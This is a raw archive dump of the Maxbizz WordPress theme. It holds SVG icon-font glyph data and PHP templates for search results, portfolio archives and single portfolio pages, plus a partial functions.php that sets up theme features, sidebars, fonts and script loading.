c22.6924 -22.6924 22.6924 -52.085 0 -74.7783c-3.02539 -3.02539 -6.05176 -6.15918 -9.07715 -9.18457c-7.99609 -8.10547 -16.209 -16.5342 -25.0703 -24.6387c6.5918 -14.5879 15.6689 -28.96 29.1768 -46.0342c27.8799 -34.2549 56.9482 -60.7295 88.9346 -81.0449
c3.13379 -1.94531 6.80762 -3.78223 10.6973 -5.72754c2.70215 -1.40527 5.51172 -2.80957 8.32129 -4.32227l34.1475 34.0391c10.9141 10.9141 23.665 16.6416 36.9561 16.6416c13.4004 0 26.043 -5.83594 36.5254 -16.75zM443.327 17.0459
c11.0225 11.4541 11.0225 22.8008 -0.108398 33.8232l-59.541 59.541l-0.216797 0.216797c-3.34961 3.67383 -8.86035 7.88867 -15.5605 7.88867c-6.80762 0 -12.6426 -4.43066 -16.3174 -8.10547l-36.957 -36.9561c-1.83691 -1.83789 -7.45605 -7.45703 -16.4248 -7.45703
c-3.56641 0 -7.02441 0.865234 -10.6982 2.70215c-0.431641 0.21582 -0.864258 0.540039 -1.29688 0.755859c-3.13379 1.94531 -6.80762 3.78223 -10.6982 5.72754c-4.32227 2.16113 -8.86035 4.43066 -13.291 7.24023c-34.6875 21.9365 -66.1338 50.5723 -95.958 87.3135
l-0.108398 0.107422c-16.4248 20.8564 -27.2314 38.3623 -34.9033 56.9482c-0.108398 0.324219 -0.216797 0.648438 -0.324219 0.972656c-1.94531 6.16016 -3.6748 15.2373 5.61914 24.5303c0.107422 0.21582 0.324219 0.324219 0.540039 0.540039
c9.40137 8.42871 18.0459 17.0742 27.123 26.3672c3.13379 3.02539 6.16016 6.15918 9.29395 9.29297c11.4541 11.4551 11.4541 22.0449 0 33.499l-29.501 29.501c-3.45801 3.56543 -6.91602 7.02344 -10.2656 10.4814c-6.5918 6.80859 -12.8594 13.1836 -19.4512 19.3428
c-0.108398 0.108398 -0.21582 0.216797 -0.324219 0.324219c-3.45801 3.45801 -8.96875 7.56445 -15.7773 7.56445c-5.51074 0 -11.1299 -2.70117 -16.4248 -7.67188l-36.8486 -36.8486c-8.96973 -8.96973 -13.832 -19.4512 -14.9131 -32.0947
c-1.62109 -19.7754 2.05371 -40.7393 12.1035 -67.6465c16.3164 -44.0889 40.9551 -85.1514 77.8037 -129.564c44.6289 -53.2744 98.3359 -95.3105 159.498 -124.919c22.3691 -10.6982 52.1934 -23.2334 84.2881 -25.2861
c1.62012 -0.108398 3.34961 -0.108398 4.9707 -0.108398c16.8574 0 29.7168 5.51074 40.6309 17.1816c6.69922 7.88867 13.832 14.9121 20.8555 21.6123c4.64648 4.53906 8.96875 8.64453 13.1836 13.1836c-0.108398 -0.108398 -0.108398 0 0 0zM276.697 326.209
c-7.99707 1.29688 -13.1836 8.96875 -11.7793 16.8574c1.40527 7.88867 8.86133 13.1836 16.8574 11.8867c34.2559 -5.83594 65.4854 -22.0449 90.2314 -46.791s40.9551 -55.9756 46.79 -90.2305c1.29688 -7.99707 -3.99805 -15.5605 -11.9941 -16.8574
c-0.864258 -0.108398 -1.62109 -0.216797 -2.48535 -0.216797c-7.02441 0 -13.1836 4.9707 -14.3721 12.1035c-4.86328 28.3115 -18.1543 54.0303 -38.6865 74.5615c-20.5312 20.5322 -46.25 33.9316 -74.5615 38.6865zM511.405 222.146
c1.40527 -7.8877 -3.99805 -15.4521 -11.8867 -16.6406c-0.864258 -0.108398 -1.62012 -0.216797 -2.48535 -0.216797c-7.02344 0 -13.1836 4.9707 -14.3721 12.1035c-8.53613 50.3564 -32.3096 96.2822 -68.835 132.807c-36.5244 36.417 -82.4502 60.2979 -132.807 68.835
c-7.99707 1.4043 -13.292 8.86133 -11.9951 16.8574c1.40527 7.88867 8.86133 13.292 16.75 11.8867c56.4072 -9.61719 107.736 -36.2002 148.584 -77.0479c40.8467 -40.8467 67.4297 -92.1758 77.0469 -148.584z" />
    <glyph glyph-name="025-trajectory" unicode="&#xf116;" 
d="M505.027 208.834c9.29785 -9.29785 9.29785 -24.3701 0 -33.668l-152.358 -152.363c-4.64941 -4.64453 -10.7422 -6.97266 -16.835 -6.97266s-12.1865 2.32812 -16.834 6.97266c-9.29785 9.29785 -9.29785 24.3711 0 33.6689l111.718 111.722h-406.911
c-13.1465 0 -23.8066 10.6611 -23.8066 23.8066c0 13.1475 10.6602 23.8066 23.8066 23.8066h406.911l-111.722 111.722c-9.29785 9.29785 -9.29785 24.3711 0 33.6689c9.2959 9.2959 24.3721 9.2959 33.6689 0z" />
    <glyph glyph-name="014-pin" unicode="&#xf10d;" 
d="M256 448c105.875 0 192 -86.1348 192 -192c0 -141.646 -177.146 -310 -184.687 -317.104c-2.06348 -1.92773 -4.68848 -2.89648 -7.31348 -2.89648s-5.25 0.96875 -7.31152 2.89648c-7.54199 7.10352 -184.688 175.457 -184.688 317.104c0 105.865 86.125 192 192 192z
M256 149.333c58.8135 0 106.667 47.8555 106.667 106.667s-47.8555 106.667 -106.667 106.667s-106.667 -47.8535 -106.667 -106.667s47.8535 -106.667 106.667 -106.667z" />
    <glyph glyph-name="029-holidays" unicode="&#xf11a;" 
d="M456.907 286.269c9.19238 -3.71191 14.916 -12.1787 14.9268 -22.0947c0.0175781 -9.91504 -5.67578 -18.3994 -14.8574 -22.1445l-36.9248 -15.0596c-5.98242 -2.44043 -12.2939 -3.68262 -18.7559 -3.69434l-23.4629 -0.0371094l-22.1914 -21.5352
c6.08496 -3.57617 10.1904 -10.1738 10.1904 -17.7275c0 -11.3398 -9.22656 -20.5654 -20.5674 -20.5654h-29.0811l-10.8555 -10.5352c-1.44531 -1.40332 -3.31445 -2.10059 -5.17969 -2.10059c-1.94141 0 -3.88086 0.755859 -5.33984 2.25781
c-2.86035 2.94922 -2.79004 7.6582 0.157227 10.5186l61.4697 59.6543l-91.6338 -0.143555l-40.8545 -69.1787c8.15918 -2.26465 18.3662 -3.88867 30.9639 -3.97949l11.3262 -0.0820312c6.87598 -0.0517578 12.4707 -5.68555 12.4707 -12.5625v-76.1367
c0 -17.1885 -3.99512 -34.4307 -11.5537 -49.8662c-7.55957 -15.4346 -18.7305 -29.1641 -32.3086 -39.7021l-37.2607 -28.918c-5.51367 -4.27832 -12.3916 -6.63574 -19.3662 -6.63574c-6.97363 0 -13.8506 2.35742 -19.3633 6.63477l-37.2627 28.9189
c-13.5771 10.5391 -24.749 24.2676 -32.3076 39.7021c-7.55957 15.4346 -11.5537 32.6777 -11.5537 49.8662c0 4.10938 3.3291 7.43848 7.43848 7.43848s7.43945 -3.3291 7.43945 -7.43848c0 -14.9326 3.47168 -29.9131 10.0381 -43.3223
c6.56641 -13.4102 16.2734 -25.3369 28.0693 -34.4932l37.2607 -28.9189c2.95898 -2.2959 6.50098 -3.50977 10.2432 -3.50977s7.28418 1.21387 10.2451 3.51074l37.2598 28.918c11.7979 9.15723 21.5029 21.084 28.0703 34.4932s10.0381 28.3896 10.0381 43.3223v73.8379
l-9.02734 0.0664062c-41.6133 0.301758 -61.4893 15.7188 -68.1045 22.333c-2.46484 2.46582 -4.78223 5.15039 -6.88574 7.97852c-0.481445 0.647461 -1.11133 0.78418 -1.55664 0.786133h-0.00488281c-0.373047 0 -1.07227 -0.106445 -1.59277 -0.799805
c-2.09277 -2.78613 -4.4209 -5.46582 -6.92188 -7.9668c-8.21484 -8.21484 -27.9873 -22.0391 -68.1035 -22.3311l-9.02637 -0.0664062v-38.6465c0 -4.10938 -3.33008 -7.43945 -7.43945 -7.43945s-7.43848 3.33008 -7.43848 7.43945v40.9473
c0 6.87695 5.59473 12.5127 12.4707 12.5625l11.3262 0.0820312c34.8096 0.25293 51.0869 11.3701 57.6904 17.9746c2.00781 2.00586 3.87207 4.15137 5.54395 6.37695c3.21973 4.28809 8.13574 6.74512 13.4902 6.74512h0.0419922
c5.35938 -0.0136719 10.2646 -2.48633 13.46 -6.78711c1.67188 -2.24902 3.51074 -4.37988 5.4668 -6.33496c1.76465 -1.76465 5.75879 -5.22949 12.6074 -8.65137l37.6816 63.8076l-41.8604 -0.0654297c-1.18066 0.0136719 -2.39746 0.0859375 -3.57715 0.256836
c-0.0625 0.00976562 -0.124023 0.0185547 -0.185547 0.0292969l-70.1191 12.0166l-49.623 -37.3525c-2.04395 -1.54004 -4.58301 -2.3916 -7.14941 -2.39648l-24.1904 -0.0419922h-0.0205078c-3.82422 0 -7.33398 2.08691 -9.16113 5.44922
c-1.83105 3.37109 -1.66699 7.45996 0.426758 10.6738l33.8418 51.918l-34.0205 51.7979c-2.10547 3.20215 -2.28516 7.29004 -0.467773 10.667c1.81641 3.37695 5.3291 5.47949 9.16406 5.4873l24.1904 0.0419922h0.0234375c2.55566 0 5.08984 -0.842773 7.13867 -2.37598
l49.75 -37.1768l70.0771 12.2598c0.0585938 0.0117188 0.118164 0.0205078 0.176758 0.0292969c1.18652 0.177734 2.39453 0.269531 3.58984 0.270508l41.7705 0.0644531l-75.6514 128.1c-1.84863 3.12891 -1.87891 7.03516 -0.0751953 10.1934
c1.80273 3.1582 5.18066 5.11816 8.81543 5.11816h0.00488281l42.9893 -0.0283203c3.94824 -0.00390625 7.67969 -1.51855 10.5098 -4.2666l83.8018 -81.3252c0.362305 0.0537109 0.730469 0.0908203 1.10742 0.0908203h26.4834
c11.3398 0 20.5664 -9.22656 20.5664 -20.5664c0 -7.19434 -3.71875 -13.5273 -9.33008 -17.2041l20.5186 -19.9111l24.1357 0.0400391h0.0898438c6.42773 0 12.7109 -1.21973 18.6777 -3.62793zM345.271 189.667v-0.000976562h-2.02734l-11.7246 -11.3779h13.752
c3.1377 0 5.68945 2.55273 5.68945 5.68848c0 3.13867 -2.55273 5.69043 -5.68945 5.69043zM345.271 347.594v-0.000976562h-12.3555l11.7256 -11.3789h0.629883c3.1377 0 5.68945 2.55273 5.68945 5.69043s-2.55273 5.68945 -5.68945 5.68945zM451.365 255.805
c5.2041 2.12305 5.59961 6.92383 5.59961 8.3457c-0.00292969 1.4209 -0.416016 6.21973 -5.62793 8.32422l-36.9756 14.9316c-4.18652 1.68848 -8.59766 2.5459 -13.1094 2.5459h-0.0625l-47.2471 -0.078125h-0.0136719c-4.10254 0 -7.43164 3.32227 -7.43848 7.42578
c-0.00683594 4.1084 3.31738 7.44434 7.42578 7.45117l1.7832 0.00292969l-132.183 128.277c-0.0429688 0.0419922 -0.0986328 0.0634766 -0.158203 0.0634766l-34.6982 0.0224609l75.8857 -128.503l54.2285 0.0849609h0.0117188
c4.10254 0 7.43164 -3.32227 7.43848 -7.42676c0.0078125 -4.1084 -3.31738 -7.44336 -7.42676 -7.4502l-113.263 -0.177734c-0.443359 -0.000976562 -0.886719 -0.03125 -1.3252 -0.09375l-73.1377 -12.7959c-2.01562 -0.350586 -4.09082 0.143555 -5.73438 1.36914
l-51.5381 38.5127l-14.9746 -0.0244141l32.1768 -48.9912c1.62402 -2.4707 1.62988 -5.66895 0.0146484 -8.14648l-32.0068 -49.1016l14.9766 0.0253906l51.4023 38.6904c1.63867 1.2334 3.71387 1.73535 5.73047 1.38867l73.1777 -12.541
c0.439453 -0.0595703 0.882812 -0.0898438 1.3252 -0.0898438h0.00976562l195.646 0.306641c4.53418 0.0078125 8.96289 0.880859 13.1631 2.59277zM234.902 274.001c5.32422 0.00390625 9.64453 -4.30957 9.64844 -9.63477
c0.00292969 -5.3252 -4.31055 -9.64551 -9.63574 -9.64844c-5.3252 -0.00390625 -9.64551 4.31055 -9.64844 9.63477c-0.00390625 5.3252 4.31055 9.64551 9.63574 9.64844zM270.583 274.024c5.32617 0.00292969 9.64453 -4.31152 9.64941 -9.63574
c0.00292969 -5.32422 -4.31152 -9.64453 -9.63672 -9.64746c-5.32422 -0.00390625 -9.64453 4.30957 -9.64746 9.63477c-0.00390625 5.3252 4.30957 9.64551 9.63477 9.64844zM305.624 274.046c5.3252 0.00390625 9.64355 -4.30957 9.64746 -9.63477
s-4.31055 -9.64551 -9.63574 -9.64844c-5.3252 -0.00390625 -9.64453 4.31055 -9.64746 9.63574c-0.00292969 5.32422 4.31055 9.64453 9.63574 9.64746zM341.305 274.069c5.3252 0.00292969 9.64453 -4.31152 9.64941 -9.63574
c0.00292969 -5.32422 -4.31152 -9.64453 -9.63574 -9.64746c-5.3252 -0.00390625 -9.64551 4.30957 -9.64844 9.63477c-0.00390625 5.3252 4.31055 9.64551 9.63477 9.64844zM150.203 131.716c7.21973 2.63379 13.7324 5.76953 19.3604 9.31543
c5.26172 3.31543 12.0615 3.31641 17.3232 -0.000976562c5.625 -3.5459 12.1396 -6.67969 19.3594 -9.31445c10.8545 -3.96191 22.9541 -6.71582 35.96 -8.18262c5.40723 -0.608398 9.4873 -5.17773 9.4873 -10.6279v-51.1484
c0 -27.2832 -12.3613 -52.5215 -33.9121 -69.248l-32.9971 -25.6094c-1.93066 -1.49902 -4.24414 -2.24902 -6.55957 -2.24902c-2.31445 0 -4.62988 0.75 -6.56152 2.25098l-32.9961 25.6074c-21.5508 16.7266 -33.9111 41.9668 -33.9111 69.248v51.1484
c0 5.44824 4.07812 10.0166 9.48633 10.6279c13.0068 1.46777 25.1055 4.2207 35.9609 8.18262zM178.952 128.445c-0.449219 0.282227 -1.00781 0.282227 -1.45703 0c-6.51758 -4.1084 -13.9844 -7.70996 -22.1934 -10.7061
c-10.9092 -3.98145 -22.8906 -6.84766 -35.6699 -8.53418v-47.4482c0 -22.6514 10.2617 -43.6064 28.1562 -57.4951l30.4346 -23.6211l30.4355 23.6211c17.8945 13.8877 28.1572 34.8438 28.1572 57.4951v47.4482c-12.7783 1.68652 -24.7627 4.55371 -35.6709 8.53418
c-8.20605 2.99609 -15.6738 6.59668 -22.1924 10.7061zM145.068 73.8252c3.26465 2.49707 7.93164 1.87793 10.4287 -1.38184l18.0225 -23.5332l37.0732 47.0459c2.54199 3.22656 7.22266 3.78223 10.4463 1.23926c3.22754 -2.54199 3.78223 -7.2207 1.23926 -10.4463
l-43 -54.5674c-1.41211 -1.79102 -3.56543 -2.83496 -5.84375 -2.83496h-0.0507812c-2.29688 0.0166016 -4.45703 1.09277 -5.85352 2.91504l-23.8447 31.1348c-2.49707 3.26172 -1.87891 7.93066 1.38281 10.4287z" />
    <glyph glyph-name="072-cancel" unicode="&#xf142;" 
d="M284.285 191.998l221.856 -221.856c7.81152 -7.80957 7.81152 -20.4736 0 -28.2842c-3.90527 -3.90527 -9.02344 -5.85742 -14.1426 -5.85742s-10.2383 1.95215 -14.1426 5.85742l-221.857 221.856l-221.855 -221.856
c-3.90527 -3.90527 -9.02344 -5.85742 -14.1426 -5.85742s-10.2383 1.95215 -14.1426 5.85742c-7.81152 7.80957 -7.81152 20.4736 0 28.2842l221.856 221.857l-221.856 221.857c-7.81152 7.80957 -7.81055 20.4736 0 28.2842c7.80957 7.81152 20.4736 7.81152 28.2842 0
l221.856 -221.857l221.858 221.857c7.80957 7.81152 20.4736 7.81055 28.2842 0c7.81152 -7.80957 7.81152 -20.4736 0 -28.2842z" />
    <glyph glyph-name="012-up-arrow" unicode="&#xf10b;" 
d="M503.814 106.176c10.9141 -10.918 10.9141 -28.6885 0 -39.6074l-16.7842 -16.7871c-5.27344 -5.26562 -12.2998 -8.1709 -19.8008 -8.1709c-7.50488 0 -14.5361 2.90527 -19.8057 8.1709l-191.537 191.545l-191.325 -191.324
c-5.27344 -5.27051 -12.3047 -8.17969 -19.8057 -8.17969s-14.5352 2.90918 -19.8057 8.17969l-16.7793 16.7793c-5.27344 5.26953 -8.1709 12.3047 -8.1709 19.8057s2.90137 14.5312 8.1709 19.8057l227.844 227.835c5.26172 5.26953 12.292 8.16211 19.793 8.16211
c7.65527 0 14.6816 -2.89258 19.9512 -8.16211z" />
    <glyph glyph-name="053-share" unicode="&#xf12f;" 
d="M453.332 362.668c0 -38.293 -31.0391 -69.3359 -69.332 -69.3359s-69.332 31.043 -69.332 69.3359c0 38.2891 31.0391 69.332 69.332 69.332s69.332 -31.043 69.332 -69.332zM453.332 362.668zM384 277.332c-47.0625 0 -85.332 38.2734 -85.332 85.3359
c0 47.0586 38.2695 85.332 85.332 85.332s85.332 -38.2734 85.332 -85.332c0 -47.0625 -38.2695 -85.3359 -85.332 -85.3359zM384 416c-29.418 0 -53.332 -23.9375 -53.332 -53.332c0 -29.3984 23.9141 -53.3359 53.332 -53.3359s53.332 23.9375 53.332 53.3359
c0 29.3945 -23.9141 53.332 -53.332 53.332zM384 416zM453.332 21.332c0 -38.2891 -31.0391 -69.332 -69.332 -69.332s-69.332 31.043 -69.332 69.332c0 38.293 31.0391 69.3359 69.332 69.3359s69.332 -31.043 69.332 -69.3359zM453.332 21.332zM384 -64
c-47.0625 0 -85.332 38.2734 -85.332 85.332c0 47.0625 38.2695 85.3359 85.332 85.3359s85.332 -38.2734 85.332 -85.3359c0 -47.0586 -38.2695 -85.332 -85.332 -85.332zM384 74.668c-29.418 0 -53.332 -23.9375 -53.332 -53.3359
c0 -29.3945 23.9141 -53.332 53.332 -53.332s53.332 23.9375 53.332 53.332c0 29.3984 -23.9141 53.3359 -53.332 53.3359zM384 74.668zM154.668 192c0 -38.293 -31.043 -69.332 -69.3359 -69.332c-38.2891 0 -69.332 31.0391 -69.332 69.332s31.043 69.332 69.332 69.332
c38.293 0 69.3359 -31.0391 69.3359 -69.332zM154.668 192zM85.332 106.668c-47.0586 0 -85.332 38.2695 -85.332 85.332s38.2734 85.332 85.332 85.332c47.0625 0 85.3359 -38.2695 85.3359 -85.332s-38.2734 -85.332 -85.3359 -85.332zM85.332 245.332
c-29.418 0 -53.332 -23.9336 -53.332 -53.332s23.9141 -53.332 53.332 -53.332c29.4219 0 53.3359 23.9336 53.3359 53.332s-23.9141 53.332 -53.3359 53.332zM85.332 245.332zM135.703 202.238c-7.42578 0 -14.6367 3.86328 -18.5625 10.7734
c-5.82422 10.2188 -2.23828 23.2539 7.98047 29.1016l197.949 112.852c10.2188 5.86719 23.2539 2.28125 29.1016 -7.97656c5.82422 -10.2188 2.23828 -23.2539 -7.98047 -29.1016l-197.953 -112.852c-3.32812 -1.89844 -6.95312 -2.79688 -10.5352 -2.79688z
M135.703 202.238zM333.633 26.2383c-3.58594 0 -7.21094 0.898438 -10.5391 2.79688l-197.953 112.852c-10.2188 5.82422 -13.8008 18.8594 -7.97656 29.1016c5.80078 10.2383 18.8555 13.8438 29.0977 7.97656l197.953 -112.852
c10.2188 -5.82422 13.8008 -18.8594 7.97656 -29.1016c-3.94531 -6.91016 -11.1562 -10.7734 -18.5586 -10.7734zM333.633 26.2383z" />
  </font>
</defs></svg>
PK�8FZݹZmm
search.phpnu�[���<?php
/**
 * The template for displaying search results pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result
 *
 * @package Maxbizz
 */

get_header();
?>

<div class="entry-content">
	<div class="container">
		<div class="row">
			<div id="primary" class="content-area <?php maxbizz_content_columns(); ?>">
				<main id="main" class="site-main">

				<?php if ( have_posts() ) : ?>

					<?php
					/* Start the Loop */
					while ( have_posts() ) :
						the_post();

						/**
						 * Run the loop for the search to output the results.
						 * If you want to overload this in a child theme then include a file
						 * called content-search.php and that will be used instead.
						 */
						get_template_part( 'template-parts/content', 'search' );

					endwhile;

	                maxbizz_posts_navigation();

				else :

					get_template_part( 'template-parts/content', 'none' );

				endif;
				?>

				</main><!-- #main -->
			</div><!-- #primary -->
			<?php get_sidebar(); ?>
		</div>
	</div>	
</div>

<?php
get_footer();

PK�8FZ$ �O

archive-ot_portfolio.phpnu�[���<?php
/**
 * The template for displaying archive portfolio pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header(); ?>

<div class="entry-content">
	<div class="container">
		<div class="row">
			<div id="primary" class="content-area col-md-12">
				<main id="main" class="site-main">	
					<div class="project-filter-wrapper">				
						<ul class="project_filters">
							<li><a href="#" data-filter="*" class="selected"><?php esc_html_e('All', 'maxbizz'); ?><span class="filter-count"></span></a></li>
							<?php 
								$terms = get_terms("portfolio_cat"); // get all categories, but you can use any taxonomy
								$count = count($terms); //How many are they?
								if ( $count > 0 ){  //If there are more than 0 terms
									foreach ( $terms as $term ) {  //for each term:
										echo "<li><a href='#' data-filter='.category-".$term->term_id."'>" . $term->name . "<span class='filter-count'></span></a></li>\n";
										//create a list item with the current term slug for sorting, and name for label
									}
								} 
							?>
						</ul>	

						<?php $p_count = wp_count_posts('ot_portfolio'); $c = $p_count->publish; if ( have_posts() ) : ?>
							<div id="projects-grid" class="projects-grid img-scale <?php maxbizz_portfolio_option_class(); ?>" data-load="3" data-count="<?php echo esc_attr($c); ?>">
								<div class="grid-sizer"></div>
								<?php
									/* Start the Loop */
									while ( have_posts() ) : the_post();

										/*
										* Include the Post-Type-specific template for the content.
										* If you want to override this in a child theme, then include a file
										* called content-___.php (where ___ is the Post Type name) and that will be used instead.
										*/
										get_template_part( 'template-parts/content', 'project' );

									endwhile; 
								?>
							</div>
							<?php if( $c >= maxbizz_get_option('portfolio_posts_per_page') ) { ?>
								<div class="btn-block"><span id="btn-loadmore" class="btn-loadmore octf-btn" data-loaded="<?php esc_attr_e('Load More','maxbizz'); ?>" data-loading="<?php esc_attr_e('Loading','maxbizz'); ?>"><?php esc_attr_e('Load More','maxbizz'); ?></span></div>							
							<?php } ?>
						<?php 	
						else :

							get_template_part( 'template-parts/content', 'none' );

						endif;
						?>	
					</div>	
				</main><!-- #main -->
			</div><!-- #primary -->
		</div>
	</div>
</div>

<?php
get_footer();

PK�8FZM2���single-ot_portfolio.phpnu�[���<?php
/**
 * The template for displaying all portfolios
 *
 * This is the template that displays all portfolio by default.
 * Please note that this is the WordPress construct of portfolios
 * and that other 'portfolios' on your WordPress site may use a
 * different template.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header();
?>

<?php
    while ( have_posts() ) : the_post();
        the_content();                            
    endwhile; // End of the loop.
?>

<?php if( maxbizz_get_option('pf_nav') || maxbizz_get_option('pf_related_switch') ) { ?>
<div class="container">
    <div class="project-bottom">        
        <?php if( maxbizz_get_option('pf_nav') ) { ?>
        <div class="single-portfolio-navigation">
            <?php maxbizz_single_post_nav(); ?>
        </div>
        <?php } ?>

        <?php if( maxbizz_get_option('pf_related_switch') ) { ?>
        <div class="portfolio-related-posts-wrap">
            <div class="portfolio-related-title-wrap">
                <h4 class="portfolio-related-title"><?php echo maxbizz_get_option('pf_related_text'); ?></h4>
            </div>
            <div class="portfolio-related-posts projects-grid img-scale">
                <div class="owl-carousel owl-theme">   
                    <?php 
                    // get the custom post type's taxonomy terms                    
                    $custom_taxterms = wp_get_object_terms( $post->ID, 'portfolio_cat', array('fields' => 'ids') );
                    // arguments
                    $args = array(
                        'post_type' => 'ot_portfolio',
                        'post_status' => 'publish',
                        'posts_per_page' => 3, // you may edit this number
                        'ignore_sticky_posts' => 1,
                        'orderby' => 'rand',
                        'tax_query' => array(
                            array(
                                'taxonomy' => 'portfolio_cat',
                                'field' => 'id',
                                'terms' => $custom_taxterms
                            )
                        ),
                        'post__not_in' => array ($post->ID),
                    );
                    $second_query = new WP_Query( $args );

                    //Loop through posts and display...
                    if($second_query->have_posts()) : while ($second_query->have_posts() ) : $second_query->the_post(); 
                        /*
                            * Include the Post-Type-specific template for the content.
                            * If you want to override this in a child theme, then include a file
                            * called content-___.php (where ___ is the Post Type name) and that will be used instead.
                            */
                        get_template_part( 'template-parts/content', 'project' );
                    endwhile; wp_reset_query(); endif; 
                    ?>
                </div>
            </div>
        </div>
        <?php } ?>         
    </div>
</div>
<?php } ?>

<?php
get_footer();PK�8FZ�x�9""
functions.phpnu�[���<?php
/**
 * Maxbizz functions and definitions
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 *
 * @package Maxbizz
 */

if ( ! function_exists( 'maxbizz_setup' ) ) :
	/**
	 * Sets up theme defaults and registers support for various WordPress features.
	 *
	 * Note that this function is hooked into the after_setup_theme hook, which
	 * runs before the init hook. The init hook is too late for some features, such
	 * as indicating support for post thumbnails.
	 */
	function maxbizz_setup() {
		/*
		 * Make theme available for translation.
		 * Translations can be filed in the /languages/ directory.
		 * If you're building a theme based on _s, use a find and replace
		 * to change 'maxbizz' to the name of your theme in all the template files.
		 */
		load_theme_textdomain( 'maxbizz', get_template_directory() . '/languages' );

		// Add default posts and comments RSS feed links to head.
		add_theme_support( 'automatic-feed-links' );

		/*
		 * Let WordPress manage the document title.
		 * By adding theme support, we declare that this theme does not use a
		 * hard-coded <title> tag in the document head, and expect WordPress to
		 * provide it for us.
		 */
		add_theme_support( 'title-tag' );
		/*
		 * Enable support for Post Thumbnails on posts and pages.
		 *
		 * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/
		 */
		add_theme_support( 'post-thumbnails' );

		// This theme uses wp_nav_menu() in one location.
		register_nav_menus( array(
			'primary' => esc_html__( 'Primary', 'maxbizz' ),
		) );

		/*
		 * Switch default core markup for search form, comment form, and comments
		 * to output valid HTML5.
		 */
		add_theme_support( 'html5', array(
			'search-form',
			'comment-form',
			'comment-list',
			'gallery',
			'caption',
		) );

		/*
		 * Enable support for Post Formats.
		 *
		 * See: https://codex.wordpress.org/Post_Formats
		 */
		add_theme_support( 'post-formats', array(
			'image',
			'video',
			'link',
			'quote',
			'gallery',
			'audio',
		) );

		/* Add image sizes */
		add_image_size( 'maxbizz-post-thumbnail-grid', 600, 400, array( 'center', 'center' ) );
		add_image_size( 'maxbizz-portfolio-thumbnail-grid', 600, 600, array( 'center', 'center' ) );
		add_image_size( 'maxbizz-portfolio-thumbnail-grid-wdouble', 1200, 600, array( 'center', 'center' ) );
		add_image_size( 'maxbizz-portfolio-thumbnail-grid-whdouble', 1200, 1200, array( 'center', 'center' ) );

		/*
		 * This theme styles the visual editor to resemble the theme style,
		 * specifically font, colors, and column width.
	 	 */
		add_editor_style( array( 'css/editor-style.css', maxbizz_fonts_url() ) );
		
	}
endif;
add_action( 'after_setup_theme', 'maxbizz_setup' );

/**
 * Register widget area.
 *
 * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar
 */
function maxbizz_widgets_init() {
	/* Register the 'primary' sidebar. */
	register_sidebar( array(
		'name'          => esc_html__( 'Primary Sidebar', 'maxbizz' ),
		'id'            => 'primary',
		'description'   => esc_html__( 'Add widgets here.', 'maxbizz' ),
		'before_widget' => '<section id="%1$s" class="widget %2$s">',
		'after_widget'  => '</section>',
		'before_title'  => '<h6 class="widget-title">',
		'after_title'   => '</h6>',
	) );
	/* Repeat register_sidebar() code for additional sidebars. */
}
add_action( 'widgets_init', 'maxbizz_widgets_init' );

/**
 * Register custom fonts.
 */
if ( ! function_exists( 'maxbizz_fonts_url' ) ) :
/**
 * Register Google fonts for Blessing.
 *
 * Create your own maxbizz_fonts_url() function to override in a child theme.
 *
 * @since Blessing 1.0
 *
 * @return string Google fonts URL for the theme.
 */
function maxbizz_fonts_url() {
	$fonts_url = '';
	$font_families     = array();
	$subsets   = 'latin,latin-ext';

	/* translators: If there are characters in your language that are not supported by Roboto Slab, translate this to 'off'. Do not translate into your own language. */

	$body_font = maxbizz_get_option( 'body_typo', [] );
	$second_font = maxbizz_get_option( 'second_font', [] );

	if ( $body_font['font-family'] == '' ) {
		$font_families[] = 'Open Sans:300,300i,400,400i,600,600i,700,700i,800,800i';
	}

	if ( $second_font['font-family'] == '' ) {
		$font_families[] = 'Inter:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i';
	}

	if ( $font_families ) {
		$fonts_url = add_query_arg( array(
			'family' => urlencode( implode( '|', $font_families ) ),
			'subset' => urlencode( $subsets ),
		), 'https://fonts.googleapis.com/css' );
	}
	return esc_url_raw( $fonts_url );
}
endif;

/**
 * Enqueue scripts and styles.
 */
function maxbizz_scripts() {

	// Add custom fonts, used in the main stylesheet.
	wp_enqueue_style( 'maxbizz-fonts', maxbizz_fonts_url(), array(), null );

	/** All frontend css files **/ 
	wp_enqueue_style( 'bootstrap', get_template_directory_uri() . '/css/bootstrap.css', array(), '4.0', 'all');
	
	/** load fonts icons **/
    wp_enqueue_style( 'maxbizz-flaticon', get_template_directory_uri().'/css/flaticon.css');

    /** Owl slider **/
	wp_enqueue_style( 'owl-slider', get_template_directory_uri().'/css/owl.carousel.min.css');
	
	/** Lightgallery Popup **/
    wp_enqueue_style( 'lightgallery', get_template_directory_uri().'/css/lightgallery.css');

	/** Theme stylesheet. **/
	wp_enqueue_style( 'maxbizz-style', get_stylesheet_uri() );	

	if( maxbizz_get_option('preload') != false ){
		wp_enqueue_script( 'royal-preloader', get_template_directory_uri()."/js/royal_preloader.min.js", array('jquery'), '20200716', true);
	}

	wp_enqueue_script( 'imagesloaded' );
	wp_enqueue_script( 'isotope', get_template_directory_uri().'/js/jquery.isotope.min.js', array('jquery'), '20200716',  true );
	wp_enqueue_script( 'lightgallery', get_template_directory_uri() . '/js/lightgallery-all.min.js', array( 'jquery' ), '20200716', true );
	wp_enqueue_script( 'owl-slider', get_template_directory_uri() . '/js/owl.carousel.min.js', array( 'jquery' ), '20200716', true );
	wp_enqueue_script( 'easypiechart', get_template_directory_uri() . '/js/easypiechart.min.js', array( 'jquery' ), '20200716', true );
	wp_enqueue_script( 'countdown', get_template_directory_uri() . '/js/jquery.countdown.min.js', array( 'jquery' ), '20180910', true );
    wp_enqueue_script( 'maxbizz-elementor', get_template_directory_uri() . '/js/elementor.js', array( 'jquery' ), '20200716', true );
	wp_enqueue_script( 'maxbizz-elementor-header', get_template_directory_uri() . '/js/elementor-header.js', array('jquery'), '20200716', true );
	wp_enqueue_script( 'maxbizz-scripts', get_template_directory_uri() . '/js/scripts.js', array( 'jquery' ), '20200716', true );

	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
